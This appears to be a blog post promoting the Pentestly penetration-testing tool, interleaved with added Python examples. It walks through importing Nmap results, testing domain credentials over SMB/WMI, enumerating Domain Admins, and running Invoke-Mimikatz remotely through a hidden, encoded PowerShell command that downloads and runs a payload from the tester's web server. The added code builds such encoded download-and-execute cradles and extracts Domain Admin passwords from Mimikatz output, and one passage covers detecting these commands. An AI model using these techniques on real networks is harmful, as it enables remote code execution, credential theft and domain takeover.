Pentestly on GitHub

Python appears to be an ever-growing trend in the security community, and being able to chain Python tools together has proven beneficial for us. PowerShell has also seen increasingly more use due to its wide availability in internal Windows environments. Pentestly brings the power of these tools together in a familiar user experience.


Pentestly stands on the shoulders of giants. Below are the tools currently utilized in Pentestly:

  • recon-ng - The recon-ng backend database is beautifully made, and Pentestly leverages it for storing and manipulating engagement data
  • wmiexec.py - Allows us to execute PowerShell commands quickly and easily via WMI
  • smbmap.py - Useful utility for enumerating SMB shares
  • Invoke-Mimikatz.ps1 - Implementation of Mimikatz in PowerShell

Below is a proof of concept demonstration of using Pentestly to automatically detect Domain Admin credentials, starting from nothing more than Domain User credentials (obtained from Gladius) and using Invoke-Mimikatz.

Demo - one step at a time


Let's walk through the demonstration one step at a time.


Import XML

As with any engagement, we start by importing Nmap XML results from the target environment (here, a scan for TCP port 445) into Pentestly:

[pentestly][demo] > load nmap
[pentestly][demo][nmap_xml] > set FILENAME /home/cduplantis/engagement/port-445.xml
FILENAME => /home/cduplantis/engagement/port-445.xml
[pentestly][demo][nmap_xml] > run
[*] 3 new records added.

-------
SUMMARY
-------
[*] 3 total (3 new) ports found.
[pentestly][demo][nmap_xml] > show ports
  +------------------------------------------------------------+
  | rowid |   ip_address   | host | port | protocol |  module  |
  +------------------------------------------------------------+
  | 1     | 10.202.208.4   |      | 445  | tcp      | nmap_xml |
  | 2     | 10.202.208.111 |      | 445  | tcp      | nmap_xml |
  | 3     | 10.202.208.112 |      | 445  | tcp      | nmap_xml |
  +------------------------------------------------------------+
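The import step above boils down to walking the Nmap XML and keeping one row per host and open port. The following is an added example using only the Python standard library; it is not Pentestly's nmap_xml module, but it produces the same kind of (ip_address, host, port, protocol) record shown in the `show ports` table. The sample XML is constructed for the example and its addresses and hostname are made up.

```python
"""Turn Nmap XML into the (ip_address, host, port, protocol) rows Pentestly stores.

Added example using only the standard library; it is not Pentestly's nmap_xml
module, but produces the same kind of record shown in the `show ports` table.
Only ports in state "open" are kept by default: a closed or filtered 445 is
useless for the login step that follows and would only add noise.
"""
import xml.etree.ElementTree as ET

# Constructed sample in the shape of `nmap -p445 -oX port-445.xml <range>`.
# Addresses and the hostname are made up for this example.
SAMPLE_XML = """\
<nmaprun scanner="nmap" args="nmap -p445 -oX port-445.xml 10.0.0.0/29">
  <host><status state="up"/>
    <address addr="10.0.0.4" addrtype="ipv4"/>
    <hostnames><hostname name="dc01.example.test" type="PTR"/></hostnames>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <service name="microsoft-ds"/></port></ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <hostnames/>
    <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text, states=("open",)):
    """Return one dict per (host, port) whose state is in `states`."""
    records = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue  # no IPv4 address (e.g. MAC-only or IPv6-only entry)
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else ""
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") not in states:
                continue
            records.append({
                "ip_address": addr.get("addr"),
                "host": hostname,
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
            })
    return records


def hosts_with_port(records, port, protocol="tcp"):
    """IPs exposing a given port: the list the login step would iterate over."""
    return [r["ip_address"] for r in records
            if r["port"] == port and r["protocol"] == protocol]


if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_XML)
    print("[*] %d records found." % len(rows))
    for r in rows:
        print("  %-15s %-20s %5d/%s" % (r["ip_address"], r["host"], r["port"], r["protocol"]))
```

Filtering on state at import time matters more than it looks: the filtered host in the sample never reaches the credential-testing loop, so the run does not stall on a port that a firewall is silently dropping.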


Credentials, credentials, credentials

We begin by attempting to authenticate with the following credentials received from Gladius:

zojix \ nsportsman : password1!
[pentestly][demo] > load login
[pentestly][demo][login] > set username nsportsman
[pentestly][demo][login] > set password password1!
[pentestly][demo][login] > set domain zojix
[pentestly][demo][login] > run
[*] Success - nsportsman:password1!@10.202.208.4
[*] Fail - nsportsman:password1!@10.202.208.111
[*] Success - nsportsman:password1!@10.202.208.112
[*] Testing execution access of credentials
[*] Execution: zojix\nsportsman:password1!@10.202.208.4 - echo
[*] Failed to execute: zojix\nsportsman:password1!@10.202.208.4
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - echo
[*] Successful execution: zojix\nsportsman:password1!@10.202.208.112

w00t! The key takeaway here is the following line:

[*] Successful execution: zojix\nsportsman:password1!@10.202.208.112

This tells us that these credentials not only authenticate to 10.202.208.112 but also give us command execution there (the echo test succeeded), whereas on 10.202.208.4 they authenticate but cannot execute anything. Execution access is what the next two steps depend on.


WhoDunIt? Domain Admins

One useful cross-reference point is to grab the Domain Admins and Enterprise Admins membership lists up front. That way, if we later come across one of those users' credentials anywhere in the domain, Pentestly will know that we have Domain Admin credentials. The lists are pulled with net group on the host where we just confirmed execution access:

[pentestly][demo] > load get_dom # fuzzy searching for get_domain_admin_names
[pentestly][demo][get_domain_admin_names] > run
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - net groups "Domain Admins" /domain
[*] Found Domain Admin: zojix\Administrator
[*] Found Domain Admin: zojix\TheRealDA
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - net groups "Enterprise Admins" /domain
[*] Found Enterprise Admin: zojix\Administrator
[*] Found Enterprise Admin: zojix\TheRealDA


Mimikatz all the things

For the grand finale, let's run Mimikatz on the machines where we have execution access. Pentestly launches Invoke-Mimikatz through a hidden, encoded PowerShell command; the target pulls the payload from Pentestly's built-in web server (the GET in the log below) and posts the results back (the POST):

[pentestly][demo] > load mimi # Again, fuzzy searching for mimikatz
[pentestly][demo][mimikatz] > run
[*] Execution: zojix\nsportsman:password1!@10.202.208.112 - powershell -window hidden -exec bypass -NonInteractive -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBE…
...snip long command…
[*] Waiting for Powershell results
10.202.208.112 - - [04/Feb/2016 07:56:46] "GET /about.html HTTP/1.1" 200 -
10.202.208.112 - - [04/Feb/2016 07:56:50] "POST / HTTP/1.1" 200 -
Starting web server
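To see what the hidden PowerShell command actually carries, it helps to know how -EncodedCommand works: the script is encoded as UTF-16LE and then Base64, which is why the blob above is full of "A" characters. The following is an added example, not Pentestly's code, that encodes a script the way powershell.exe -Enc expects it and decodes a blob back, tolerating the kind of truncation the transcript shows. Decoding the prefix visible on the page yields the start of a download cradle, `IEX (New-Object Net.Webclient).`, which lines up with the GET to Pentestly's web server in the log above. The host, port and path in the constructed cradle are made up; `about.html` mirrors the GET seen above.

```python
"""Encode and decode PowerShell -EncodedCommand (-Enc) payloads.

Added example, not Pentestly's code. powershell.exe -Enc takes the script as
Base64 over its UTF-16LE bytes, which is why the blob on the page is full of
"A" characters: the high byte of every ASCII character is 0x00.
"""
import base64
import re

# The visible prefix of the -Enc argument from the transcript above, cut
# exactly where the page cuts it.
PAGE_PREFIX = ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABp"
               "AGUAbgB0ACkALgBE")

# Constructed download cradle of the kind the page's command begins with. The
# host, port and path are made up; "about.html" mirrors the GET in the log above.
CRADLE = "IEX (New-Object Net.Webclient).DownloadString('http://10.0.0.99:8080/about.html')"


def encode_powershell(script):
    """Produce the argument for `powershell -Enc <blob>`."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob):
    """Recover the script from a -Enc blob, tolerating a truncated blob."""
    blob = re.sub(r"\s", "", blob)            # strip wrapping from copy/paste
    blob += "=" * (-len(blob) % 4)            # re-pad a blob cut mid-quantum
    raw = base64.b64decode(blob)
    # errors="ignore" drops a dangling half of a UTF-16 code unit at the end.
    return raw.decode("utf-16-le", errors="ignore")


CRADLE_RE = re.compile(r"(iex|invoke-expression).*(downloadstring|downloadfile|net\.webclient)",
                       re.IGNORECASE | re.DOTALL)


def looks_like_cradle(script):
    """True when a decoded script reads like an in-memory download-and-execute."""
    return CRADLE_RE.search(script) is not None


if __name__ == "__main__":
    print(decode_powershell(PAGE_PREFIX))
    blob = encode_powershell(CRADLE)
    print("powershell -window hidden -exec bypass -NonInteractive -Enc " + blob)
    print(looks_like_cradle(decode_powershell(blob)))
```

On the defensive side, the same decode is what a detection pipeline should do with every `-Enc`/`-EncodedCommand` argument it sees in process-creation logs; the combination of `-window hidden -exec bypass -NonInteractive -Enc` and a decoded body that matches the cradle pattern is a strong signal on its own.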

After parsing the Mimikatz output, Pentestly cross-references the recovered users against the Domain Admin list gathered earlier and immediately recognizes a Domain Admin in the Mimikatz output. In this case a Domain Admin had logged into a user workstation, leaving their credentials in memory for Mimikatz to recover. Silly, DA.

[*] Success! TheRealDA:<leetpassword>tryGUESSINGthisdrowssaP</leetpassword>  - DOMAIN ADMIN!
You have one DA, do you want to continue to find more? [yN]
>
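The Domain Admin lookup two steps back and the cross-reference Pentestly performs here fit in a few dozen lines. The following is an added example, not Pentestly's own parsers: it pulls the member list out of `net group "Domain Admins" /domain` output, extracts (domain, user, secret) tuples from Mimikatz `sekurlsa::logonpasswords` output, and flags any credential belonging to a Domain Admin. The same net group parser serves the "Enterprise Admins" query. Both sample outputs are constructed for this example; the field layouts follow what net.exe and Mimikatz print, but column widths and provider names vary between Windows and Mimikatz versions, so treat the regexes as a starting point.

```python
"""Cross-reference Mimikatz output against Domain Admins membership.

Added example, not Pentestly's own parsers: it rebuilds the get_domain_admin_names
step (parsing `net group "Domain Admins" /domain`) and the post-Mimikatz check
from the walkthrough. The sample outputs below are constructed for this example.
"""
import re

# Constructed `net group "Domain Admins" /domain` output. net.exe prints members
# in padded columns, up to three per line.
NET_GROUP_OUTPUT = """\
The request will be processed at a domain controller for domain zojix.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            TheRealDA
The command completed successfully.
"""

# Constructed `sekurlsa::logonpasswords` excerpt: a DA with a cleartext wdigest
# password, a machine account, and the low-privilege user we started from.
MIMIKATZ_OUTPUT = """\
Authentication Id : 0 ; 1463890 (00000000:00165652)
Session           : Interactive from 2
User Name         : TheRealDA
Domain            : ZOJIX
        msv :
         [00000003] Primary
         * Username   : TheRealDA
         * Domain     : ZOJIX
         * NTLM       : 0123456789abcdef0123456789abcdef
        wdigest :
         * Username   : TheRealDA
         * Domain     : ZOJIX
         * Password   : tryGUESSINGthisdrowssaP
        kerberos :
         * Username   : TheRealDA
         * Domain     : ZOJIX.LOCAL
         * Password   : (null)

Authentication Id : 0 ; 999 (00000000:000003e7)
User Name         : WS01$
Domain            : ZOJIX
        msv :
         [00000003] Primary
         * Username   : WS01$
         * Domain     : ZOJIX
         * NTLM       : fedcba9876543210fedcba9876543210

Authentication Id : 0 ; 882455 (00000000:000d7717)
User Name         : nsportsman
Domain            : ZOJIX
        wdigest :
         * Username   : nsportsman
         * Domain     : ZOJIX
         * Password   : password1!
"""


def parse_net_group(text):
    """Member names from `net group <group> /domain` output."""
    members, in_members = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_members = True
        elif line.startswith("The command completed"):
            break
        elif in_members and line.strip():
            # Columns are separated by runs of spaces; a name containing a
            # single space survives, but two 24-character names would not.
            members.extend(re.split(r"\s{2,}", line.strip()))
    return members


FIELD_RE = re.compile(r"^\s*\*\s+(Username|Domain|Password|NTLM)\s*:\s*(.*?)\s*$")


def parse_mimikatz(text):
    """Set of (DOMAIN, user, 'password'|'ntlm', secret) from logonpasswords output."""
    creds, cur = set(), {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "username":
            cur = {"username": value}                     # each provider block restarts here
        elif key == "domain":
            cur["domain"] = value.split(".")[0].upper()   # ZOJIX.LOCAL -> ZOJIX
        else:  # password or ntlm
            user = cur.get("username", "(null)")
            if value == "(null)" or user == "(null)" or user.endswith("$"):
                continue                                  # empty secret or machine account
            creds.add((cur.get("domain", ""), user, key, value))
    return creds


def find_domain_admins(creds, admins):
    """Credentials whose user is in the Domain Admins list (case-insensitive)."""
    wanted = {a.lower() for a in admins}
    return sorted(c for c in creds if c[1].lower() in wanted)


if __name__ == "__main__":
    admins = parse_net_group(NET_GROUP_OUTPUT)
    for domain, user, kind, secret in find_domain_admins(parse_mimikatz(MIMIKATZ_OUTPUT), admins):
        print("[*] Success! %s\\%s %s:%s - DOMAIN ADMIN!" % (domain, user, kind, secret))
```

Two details carry most of the value: the Kerberos provider reports the DNS domain (ZOJIX.LOCAL) while msv and wdigest report the NetBIOS name, so the domain is normalised before comparison, and machine accounts (names ending in `$`) are dropped so a computer account that happens to share a name with a group member cannot produce a false "DOMAIN ADMIN" hit.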


Start playing with Pentestly today: Pentestly on GitHub

Or, get started with Pentestly now:

git clone http://github.com/praetorian-inc/pentestly

 




